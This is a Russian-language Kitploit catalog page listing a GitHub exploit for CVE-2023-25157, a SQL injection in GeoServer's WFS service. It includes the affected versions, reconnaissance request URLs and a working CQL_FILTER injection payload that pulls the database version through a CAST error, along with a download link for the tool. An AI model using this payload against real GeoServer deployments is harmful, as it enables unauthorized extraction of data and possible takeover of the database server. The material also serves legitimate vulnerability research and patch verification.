Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-25157 — Эксплойт для CVE-2023-25157: SQL-инъекция в сервисе WFS GeoServer через специально сформированный синтаксис фильтра CQL, позволяющая неавторизованное удалённое извлечение данных и потенциальную компрометацию сервера базы данных. | Kitploit
Инструменты/GitHubGitHub/charis3306/cve-2023-25157
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubcharis3306/cve-2023-25157

CVE-2023-25157

Эксплойт для CVE-2023-25157: SQL-инъекция в сервисе WFS GeoServer через специально сформированный синтаксис фильтра CQL, позволяющая неавторизованное удалённое извлечение данных и потенциальную компрометацию сервера базы данных.

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание уязвимости

Из-за отсутствия фильтрации пользовательского ввода удалённый неавторизованный злоумышленник может сформировать некорректный синтаксис фильтра, обойти лексический анализ GeoServer и вызвать SQL-инъекцию, получить доступ к конфиденциальной информации на сервере и даже получить права на сервере базы данных.

Затронутые версии

GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

POC

Получение доступных имён типов объектов

Поиск

root@kitploit:~
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Получение доступных атрибутов соответствующего типа объекта

Получение соответствующих атрибутов для типа объекта vulhub:example

root@kitploit:~
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

root@kitploit:~
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true

Скачать инструмент